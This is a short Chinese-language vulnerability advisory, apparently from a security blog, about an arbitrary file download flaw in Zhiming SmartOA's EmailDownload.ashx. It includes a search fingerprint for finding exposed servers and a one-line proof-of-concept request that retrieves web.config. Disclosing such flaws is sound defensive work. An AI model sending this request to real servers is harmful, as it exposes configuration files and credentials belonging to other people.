智明 SmartOA EmailDownload.ashx 任意文件下载漏洞

漏洞描述

智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞可下载服务器上的敏感文件,查看敏感信息。

漏洞影响

智明 SmartOA

网络测绘

app=”智明协同-SmartOA”

漏洞复现

登录页面

20240311152401449-1631326538226-96c43380-0494-47e1-899c-7e115530b1bb.9091f8de_2024-03-11_15-23-31 (1)

验证POC

/file/EmailDownload.ashx?url=~/web.config&name=web.config

20240311152528858-1631326793699-a63d3321-beee-4241-9369-2e3ccb9ac39f.4e781d14_2024-03-11_15-24-58 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容